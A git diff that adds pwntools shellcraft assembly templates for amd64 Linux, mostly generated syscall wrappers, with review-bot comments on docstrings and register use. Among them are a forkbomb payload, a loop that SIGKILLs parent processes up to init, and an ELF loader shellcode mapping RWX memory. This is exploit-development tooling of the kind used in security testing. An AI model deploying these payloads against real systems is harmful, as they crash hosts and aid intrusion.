/dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/flock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, operation"/> +<%docstring> +Invokes the syscall flock. See 'man 2 flock' for more information. + +Arguments: + fd(int): fd + operation(int): operation + + + ${syscall('SYS_flock', fd, operation)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fork.asm b/pwnlib/shellcraft/templates/amd64/linux/fork.asm new file mode 100644 index 000000000..1af6a658b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fork.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall fork. See 'man 2 fork' for more information. + +Arguments: + + + + ${syscall('SYS_fork')} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/forkbomb.asm b/pwnlib/shellcraft/templates/amd64/linux/forkbomb.asm
new file mode 100644
index 000000000..06d4f2f5f
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/forkbomb.asm
@@ -0,0 +1,13 @@
+<%
+ from pwnlib.shellcraft.amd64.linux import fork
+ from pwnlib.shellcraft.common import label
+%>
+<%docstring>
+Performs a forkbomb attack.
+
+<%
+ dosloop = label('fork_bomb')
+%>
+${dosloop}:
+ ${fork()}
+ jmp ${dosloop}
diff --git a/pwnlib/shellcraft/templates/amd64/linux/forkexit.asm b/pwnlib/shellcraft/templates/amd64/linux/forkexit.asm
new file mode 100644
index 000000000..5ea2d3be3
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/forkexit.asm
@@ -0,0 +1,16 @@
+<%
+ from pwnlib.shellcraft import common
+ from pwnlib.shellcraft.amd64.linux import fork, exit
+%>
+<%page args=""/>
+<%docstring>
+Attempts to fork. If the fork is successful, the parent exits.
+
+<%
+dont_exit = common.label('forkexit')
+%>
+ ${fork()}
+ cmp rax, 1
+ jl ${dont_exit}
+ ${exit(0)}
+${dont_exit}:
diff --git a/pwnlib/shellcraft/templates/amd64/linux/fstat.asm b/pwnlib/shellcraft/templates/amd64/linux/fstat.asm
new file mode 100644
index 000000000..2e2736eb0
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/fstat.asm
@@ -0,0 +1,14 @@
+
+<%
+ from pwnlib.shellcraft.amd64.linux import syscall
+%>
+<%page args="fd, buf"/>
+<%docstring>
+Invokes the syscall fstat. See 'man 2 fstat' for more information.
+
+Arguments:
+ fd(int): fd
+ buf(stat): buf
+
+
+ ${syscall('SYS_fstat', fd, buf)}
diff --git a/pwnlib/shellcraft/templates/amd64/linux/fstat64.asm b/pwnlib/shellcraft/templates/amd64/linux/fstat64.asm
new file mode 100644
index 000000000..08fdf990e
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/fstat64.asm
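Review bot: `cmp rax, 1` / `jl ${dont_exit}` in forkexit.asm routes both the child (rax == 0) and a failed fork (negative rax) to `${dont_exit}`, so on failure the single process simply continues; the docstring "If the fork is successful, the parent exits." leaves that implicit. Add a docstring line such as `On failure (negative return value) execution also continues at the label; only the parent (positive pid) exits.` so callers do not assume a fork failure terminates the process. forkbomb.asm in the same line omits the `<%page args=""/>` line that forkexit.asm and the generated stubs carry; this appears harmless for Mako but is inconsistent with the rest of the commit.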
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, buf"/> +<%docstring> +Invokes the syscall fstat64. See 'man 2 fstat64' for more information. + +Arguments: + fd(int): fd + buf(stat64): buf + + + ${syscall('SYS_fstat64', fd, buf)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fstatat64.asm b/pwnlib/shellcraft/templates/amd64/linux/fstatat64.asm new file mode 100644 index 000000000..b20758760 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fstatat64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, buf, flag"/> +<%docstring> +Invokes the syscall fstatat64. See 'man 2 fstatat64' for more information. + +Arguments: + fd(int): fd + file(char): file + buf(stat64): buf + flag(int): flag + + + ${syscall('SYS_fstatat64', fd, file, buf, flag)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/fsync.asm b/pwnlib/shellcraft/templates/amd64/linux/fsync.asm new file mode 100644 index 000000000..4d1bc776d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/fsync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd"/> +<%docstring> +Invokes the syscall fsync. See 'man 2 fsync' for more information. + +Arguments: + fd(int): fd + + + ${syscall('SYS_fsync', fd)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ftruncate.asm b/pwnlib/shellcraft/templates/amd64/linux/ftruncate.asm new file mode 100644 index 000000000..89c87833f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ftruncate.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate. See 'man 2 ftruncate' for more information. + +Arguments: + fd(int): fd + length(off_t): length + + + ${syscall('SYS_ftruncate', fd, length)} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/ftruncate64.asm b/pwnlib/shellcraft/templates/amd64/linux/ftruncate64.asm new file mode 100644 index 000000000..4192a1707 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ftruncate64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, length"/> +<%docstring> +Invokes the syscall ftruncate64. See 'man 2 ftruncate64' for more information. + +Arguments: + fd(int): fd + length(off64_t): length + + + ${syscall('SYS_ftruncate64', fd, length)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/futimesat.asm b/pwnlib/shellcraft/templates/amd64/linux/futimesat.asm new file mode 100644 index 000000000..62af5f0b3 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/futimesat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, file, tvp"/> +<%docstring> +Invokes the syscall futimesat. See 'man 2 futimesat' for more information. + +Arguments: + fd(int): fd + file(char): file + tvp(timeval): tvp + + + ${syscall('SYS_futimesat', fd, file, tvp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getcwd.asm b/pwnlib/shellcraft/templates/amd64/linux/getcwd.asm new file mode 100644 index 000000000..f67a43a51 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getcwd.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="buf, size"/> +<%docstring> +Invokes the syscall getcwd. See 'man 2 getcwd' for more information. + +Arguments: + buf(char): buf + size(size_t): size + + + ${syscall('SYS_getcwd', buf, size)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getegid.asm b/pwnlib/shellcraft/templates/amd64/linux/getegid.asm new file mode 100644 index 000000000..ce0a6c787 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getegid.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getegid. See 'man 2 getegid' for more information. + +Arguments: + + + + ${syscall('SYS_getegid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/geteuid.asm b/pwnlib/shellcraft/templates/amd64/linux/geteuid.asm new file mode 100644 index 000000000..1cb726ae9 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/geteuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall geteuid. See 'man 2 geteuid' for more information. + +Arguments: + + + + ${syscall('SYS_geteuid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getgid.asm b/pwnlib/shellcraft/templates/amd64/linux/getgid.asm new file mode 100644 index 000000000..3ae8ca424 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getgid. See 'man 2 getgid' for more information. + +Arguments: + + + + ${syscall('SYS_getgid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getgroups.asm b/pwnlib/shellcraft/templates/amd64/linux/getgroups.asm new file mode 100644 index 000000000..925132549 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="size, list"/> +<%docstring> +Invokes the syscall getgroups. See 'man 2 getgroups' for more information. + +Arguments: + size(int): size + list(gid_t): list + + + ${syscall('SYS_getgroups', size, list)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getitimer.asm b/pwnlib/shellcraft/templates/amd64/linux/getitimer.asm new file mode 100644 index 000000000..bbd067d6b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getitimer.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="which, value"/> +<%docstring> +Invokes the syscall getitimer. See 'man 2 getitimer' for more information. + +Arguments: + which(itimer_which_t): which + value(itimerval): value + + + ${syscall('SYS_getitimer', which, value)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpeername.asm b/pwnlib/shellcraft/templates/amd64/linux/getpeername.asm new file mode 100644 index 000000000..e49804c37 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpeername.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getpeername. See 'man 2 getpeername' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getpeername', fd, addr, len)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpgid.asm b/pwnlib/shellcraft/templates/amd64/linux/getpgid.asm new file mode 100644 index 000000000..524187238 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getpgid. See 'man 2 getpgid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getpgid', pid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpgrp.asm b/pwnlib/shellcraft/templates/amd64/linux/getpgrp.asm new file mode 100644 index 000000000..3ee5b10da --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpgrp.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getpgrp. See 'man 2 getpgrp' for more information. + +Arguments: + + + + ${syscall('SYS_getpgrp')} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpid.asm b/pwnlib/shellcraft/templates/amd64/linux/getpid.asm new file mode 100644 index 000000000..f6f86d21c --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpid.asm @@ -0,0 +1,4 @@ +<% from pwnlib.shellcraft import amd64 %> +<%docstring>Retrieve the current PID + +${amd64.linux.syscall('SYS_getpid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpmsg.asm b/pwnlib/shellcraft/templates/amd64/linux/getpmsg.asm new file mode 100644 index 000000000..ef421e17d --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, bandp, flagsp"/> +<%docstring> +Invokes the syscall getpmsg. See 'man 2 getpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + bandp(int): bandp + flagsp(int): flagsp + + + ${syscall('SYS_getpmsg', fildes, ctlptr, dataptr, bandp, flagsp)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getppid.asm b/pwnlib/shellcraft/templates/amd64/linux/getppid.asm new file mode 100644 index 000000000..cc416a5d4 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getppid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getppid. See 'man 2 getppid' for more information. + +Arguments: + + + + ${syscall('SYS_getppid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getpriority.asm b/pwnlib/shellcraft/templates/amd64/linux/getpriority.asm new file mode 100644 index 000000000..148d4da23 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getpriority.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="which, who"/> +<%docstring> +Invokes the syscall getpriority. See 'man 2 getpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + + + ${syscall('SYS_getpriority', which, who)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getresgid.asm b/pwnlib/shellcraft/templates/amd64/linux/getresgid.asm new file mode 100644 index 000000000..675aaf132 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall getresgid. See 'man 2 getresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_getresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getresuid.asm b/pwnlib/shellcraft/templates/amd64/linux/getresuid.asm new file mode 100644 index 000000000..e431f6050 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall getresuid. See 'man 2 getresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_getresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getrlimit.asm b/pwnlib/shellcraft/templates/amd64/linux/getrlimit.asm new file mode 100644 index 000000000..ebd591105 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getrlimit.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall getrlimit. See 'man 2 getrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_getrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getrusage.asm b/pwnlib/shellcraft/templates/amd64/linux/getrusage.asm new file mode 100644 index 000000000..8dc8f4fb7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getrusage.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="who, usage"/> +<%docstring> +Invokes the syscall getrusage. See 'man 2 getrusage' for more information. + +Arguments: + who(rusage_who_t): who + usage(rusage): usage + + + ${syscall('SYS_getrusage', who, usage)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getsid.asm b/pwnlib/shellcraft/templates/amd64/linux/getsid.asm new file mode 100644 index 000000000..b9f6b7712 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall getsid. See 'man 2 getsid' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_getsid', pid)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getsockname.asm b/pwnlib/shellcraft/templates/amd64/linux/getsockname.asm new file mode 100644 index 000000000..58cea7988 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getsockname.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, addr, len"/> +<%docstring> +Invokes the syscall getsockname. See 'man 2 getsockname' for more information. + +Arguments: + fd(int): fd + addr(SOCKADDR_ARG): addr + len(socklen_t): len + + + ${syscall('SYS_getsockname', fd, addr, len)} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/getsockopt.asm b/pwnlib/shellcraft/templates/amd64/linux/getsockopt.asm new file mode 100644 index 000000000..6a3d1d53f --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall getsockopt. See 'man 2 getsockopt' for more information. + +Arguments: + fd(int): fd + level(int): level + optname(int): optname + optval(void): optval + optlen(socklen_t): optlen + + + ${syscall('SYS_getsockopt', fd, level, optname, optval, optlen)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/gettimeofday.asm b/pwnlib/shellcraft/templates/amd64/linux/gettimeofday.asm new file mode 100644 index 000000000..3bf10fbf6 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/gettimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall gettimeofday. See 'man 2 gettimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone_ptr_t): tz + + + ${syscall('SYS_gettimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/getuid.asm b/pwnlib/shellcraft/templates/amd64/linux/getuid.asm new file mode 100644 index 000000000..db48d9483 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/getuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall getuid. See 'man 2 getuid' for more information. + +Arguments: + + + + ${syscall('SYS_getuid')} diff --git a/pwnlib/shellcraft/templates/amd64/linux/gtty.asm b/pwnlib/shellcraft/templates/amd64/linux/gtty.asm new file mode 100644 index 000000000..90cfc8048 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/gtty.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall gtty. See 'man 2 gtty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_gtty', fd, params)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ioctl.asm b/pwnlib/shellcraft/templates/amd64/linux/ioctl.asm new file mode 100644 index 000000000..e7c15bfb7 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ioctl.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fd, request, vararg"/> +<%docstring> +Invokes the syscall ioctl. See 'man 2 ioctl' for more information. + +Arguments: + fd(int): fd + request(unsigned): request + vararg(int): vararg + + + ${syscall('SYS_ioctl', fd, request, vararg)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/ioperm.asm b/pwnlib/shellcraft/templates/amd64/linux/ioperm.asm new file mode 100644 index 000000000..9224ddfaf --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/ioperm.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="from, num, turn_on"/> +<%docstring> +Invokes the syscall ioperm. See 'man 2 ioperm' for more information. + +Arguments: + from(unsigned): from + num(unsigned): num + turn_on(int): turn_on + + + ${syscall('SYS_ioperm', from, num, turn_on)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/iopl.asm b/pwnlib/shellcraft/templates/amd64/linux/iopl.asm new file mode 100644 index 000000000..3957c9af4 --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/iopl.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="level"/> +<%docstring> +Invokes the syscall iopl. See 'man 2 iopl' for more information. + +Arguments: + level(int): level + + + ${syscall('SYS_iopl', level)} 
diff --git a/pwnlib/shellcraft/templates/amd64/linux/kill.asm b/pwnlib/shellcraft/templates/amd64/linux/kill.asm
new file mode 100644
index 000000000..67a7777f7
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/kill.asm
@@ -0,0 +1,5 @@
+<% from pwnlib.shellcraft import amd64 %>
+<%page args="pid, signal = 'SIGKILL'"/>
+<%docstring>Writes a string to a file descriptor
+
+ ${amd64.linux.syscall('SYS_kill', pid, signal)}
diff --git a/pwnlib/shellcraft/templates/amd64/linux/killparent.asm b/pwnlib/shellcraft/templates/amd64/linux/killparent.asm
new file mode 100644
index 000000000..2f00cf9dd
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/killparent.asm
@@ -0,0 +1,17 @@
+<%
+ from pwnlib.shellcraft.amd64.linux import getppid, kill
+ from pwnlib.constants import SIGKILL
+ from pwnlib.shellcraft.common import label
+%>
+<%docstring>
+Kills its parent process until whatever the parent is (probably init)
+cannot be killed any longer.
+
+<%
+ killparent_loop = label('killparent')
+%>
+${killparent_loop}:
+ ${getppid()}
+ ${kill('eax', SIGKILL)}
+ test eax, eax
+ jz ${killparent_loop}
diff --git a/pwnlib/shellcraft/templates/amd64/linux/lchown.asm b/pwnlib/shellcraft/templates/amd64/linux/lchown.asm
new file mode 100644
index 000000000..d7b2945b2
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/lchown.asm
@@ -0,0 +1,15 @@
+
+<%
+ from pwnlib.shellcraft.amd64.linux import syscall
+%>
+<%page args="file, owner, group"/>
+<%docstring>
+Invokes the syscall lchown. See 'man 2 lchown' for more information.
+
+Arguments:
+ file(char): file
+ owner(uid_t): owner
+ group(gid_t): group
+
+
+ ${syscall('SYS_lchown', file, owner, group)}
diff --git a/pwnlib/shellcraft/templates/amd64/linux/link.asm b/pwnlib/shellcraft/templates/amd64/linux/link.asm
new file mode 100644
index 000000000..d6400d19a
--- /dev/null
+++ b/pwnlib/shellcraft/templates/amd64/linux/link.asm
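Review bot: The docstring `<%docstring>Writes a string to a file descriptor` in kill.asm is copied from a write template and describes the wrong syscall. Replace it with `<%docstring>Sends signal ``signal`` (default SIGKILL) to process ``pid``; see 'man 2 kill'.` and document the two page arguments the way the generated stubs in this commit do, e.g. `pid(int, str): target pid, or a register holding it` and `signal(int, str): signal number or constant name`.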
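Review bot: killparent.asm uses the 32-bit names `eax` in `${kill('eax', SIGKILL)}` and `test eax, eax` inside an amd64 template whose siblings use 64-bit registers (forkexit: `cmp rax, 1`); getppid's result arrives in `rax`, and whether `kill('eax', ...)` is turned into a correct `rdi` setup depends on how `amd64.setregs` treats 32-bit register names, which is not visible in this diff. For consistency and to avoid relying on that, write `${kill('rax', SIGKILL)}` and `test rax, rax`. The loop condition also deserves a comment, since it depends on the return-value convention: `## kill() returns 0 on success, so loop until the parent can no longer be signalled`.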
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall link. See 'man 2 link' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_link', from, to)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/linkat.asm b/pwnlib/shellcraft/templates/amd64/linux/linkat.asm new file mode 100644 index 000000000..0746e218b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/linkat.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.amd64.linux import syscall +%> +<%page args="fromfd, from, tofd, to, flags"/> +<%docstring> +Invokes the syscall linkat. See 'man 2 linkat' for more information. + +Arguments: + fromfd(int): fromfd + from(char): from + tofd(int): tofd + to(char): to + flags(int): flags + + + ${syscall('SYS_linkat', fromfd, from, tofd, to, flags)} diff --git a/pwnlib/shellcraft/templates/amd64/linux/loader.asm b/pwnlib/shellcraft/templates/amd64/linux/loader.asm new file mode 100644 index 000000000..a39da5c1b --- /dev/null +++ b/pwnlib/shellcraft/templates/amd64/linux/loader.asm 
@@ -0,0 +1,221 @@ +<% + from pwnlib.shellcraft.amd64.linux import exit as exit + from pwnlib.shellcraft.amd64.linux import mmap + from pwnlib.shellcraft.amd64 import setregs, pushad, popad + + from pwnlib.shellcraft import common + from pwnlib.util.packing import unpack +%> +<%page args="address"/> +<%docstring> +Loads a statically-linked ELF into memory and transfers control. + +Arguments: + address(int): Address of the ELF as a register or integer. + +Example: + +:: + from pwn import * + context.arch='amd64' + c = constants + p = process(['gcc','-m64','-static','-Wl,-Ttext-segment=0x20000000','-xc','-']) + p.send(''' + #include + int main() { + printf("Hello, %s!\\n", "world"); + return 123; + } + ''') + p.shutdown('send') + p.recv() + assert p.poll(1) == 0 + e = ELF('a.out') + data = read('a.out') + + # Read the length first + sc = shellcraft.read(0, 'rsp', 8) + sc += ''' + pop rsi /* rsi = length */ + mov rcx, rsi + /* page-align rcx */ + shr rcx, 12 + inc rcx + shl rcx, 12 + /* save rsi for later */ + push rsi + ''' + sc += shellcraft.mmap(0, 'rcx', c.PROT_READ|c.PROT_WRITE, c.MAP_PRIVATE|c.MAP_ANONYMOUS, -1, 0) + sc += 'pop rsi\n' # get saved RSI + sc += 'push rax\n' # save memory address for loader + sc += shellcraft.readn(0, 'rax', 'rsi') + sc += 'pop rax\n' + sc += shellcraft.loader('rax') + + p = run_assembly(sc) + p.pack(len(data)) + p.send(data) + assert p.recvline() == 'Hello, world!\n' + assert p.poll(1) == 123 + + +<% +elf_magic = unpack('\x7fELF', 32) +die = common.label('die') +load_one = common.label('load_one') +next_phdr = common.label('next_phdr') +""" +Elf64_Ehdr + +0x0000 e_ident : unsigned char [16] + +0x0010 e_type : Elf64_Half + +0x0012 e_machine : Elf64_Half + +0x0014 e_version : Elf64_Word + +0x0018 e_entry : Elf64_Addr + +0x0020 e_phoff : Elf64_Off + +0x0028 e_shoff : Elf64_Off + +0x0030 e_flags : Elf64_Word + +0x0034 e_ehsize : Elf64_Half + +0x0036 e_phentsize : Elf64_Half + +0x0038 e_phnum : Elf64_Half + +0x003a e_shentsize : 
Elf64_Half + +0x003c e_shnum : Elf64_Half + +0x003e e_shstrndx : Elf64_Half + +Elf64_Phdr + +0x0000 p_type : Elf64_Word + +0x0004 p_flags : Elf64_Word + +0x0008 p_offset : Elf64_Off + +0x0010 p_vaddr : Elf64_Addr + +0x0018 p_paddr : Elf64_Addr + +0x0020 p_filesz : Elf64_Xword + +0x0028 p_memsz : Elf64_Xword + +0x0030 p_align : Elf64_Xword +""" +e_entry = 0x0018 +e_phoff = 0x0020 +e_phnum = 0x0038 +e_phentsize = 0x0036 +p_type = 0x0000 +p_offset = 0x0008 +p_vaddr = 0x0010 +p_filesz = 0x0020 +p_memsz = 0x0028 + + +PT_LOAD = 1 +%> + + ${setregs({'rsi': address})} + + /* Check the ELF header */ + mov eax, dword ptr [rsi] + cmp rax, ${elf_magic} + jnz ${die} + + /* Discover program headers */ + mov rax, rsi + xor rbx, rbx + mov ebx, dword ptr ${e_phoff} + add rax, rbx + mov rax, [rax] + add rax, rsi /* rax = &program headers */ + + mov rbx, rsi + add rbx, ${e_phentsize} + movzx rbx, word ptr [rbx] /* rbx = sizeof(program header) */ + + mov rcx, rsi + add rcx, ${e_phnum} + movzx rcx, word ptr [rcx] /* rcx = # of program headers */ + +1: + /* For each section header, mmap it to the desired address */ + push rsi + push rcx + push rbx + push rax + call ${load_one} + pop rax + pop rbx + pop rcx + pop rsi + add rax, rbx + loop 1b + + /* Everything is loaded and RWX. Find the entry point and call it */ + mov rax, rsi + add rax, ${e_entry} + mov rax, [rax] + + /* Set up the fake stack. 
+ /* AT_NULL */ + xor rbx, rbx + push rbx + push rbx + /* AT_RANDOM */ + push rsp + push 25 + + push rbx /* envp */ + push rbx /* argv */ + push rbx /* argc */ + + /* Invoke the entry point */ + jmp rax + +${load_one}: + push rbp + mov rbp, rsp + + /* If it's not a PT_LOAD header, don't care */ + mov rbx, rax + /* add rbx, ${p_type} == zero */ + cmp dword ptr [rbx], ${PT_LOAD} + jnz ${next_phdr} + + /* Get the destination address into rdi */ + mov rdi, rax + add rdi, ${p_vaddr} + mov rdi, [rdi] + + /* Get the size to mmap into rbx */ + mov rbx, rax + add rbx, ${p_memsz} + mov rbx, [rbx] + shr rbx, 12 + inc rbx + + /* We can't move the program break with brk(), + so we basically have to fake it. Allocate + more space than we ever expect the heap to + need, by over-allocating space by 8x */ + shl rbx, 12 + 4 + + /* Map the page in */ + ${pushad()} + ${mmap('rdi', 'rbx', 'PROT_READ|PROT_WRITE|PROT_EXEC', 'MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED', 0, 0)} + /* Ignore failure */ + ${popad()} + + /* Get the source address into rsi */ + mov rbx, rax + add rbx, ${p_offset} + mov rbx, [rbx] + add rsi, rbx + + /* Get the number of bytes into rcx */ + mov rcx, rax + add rcx, ${p_filesz} + mov rcx, [rcx] + + /* Copy the data */ + cld + rep movsb [rdi], [rsi] + +${next_phdr}: + mov rsp, rbp + pop rbp + ret + +${die}: + ${exit(1)} diff --git 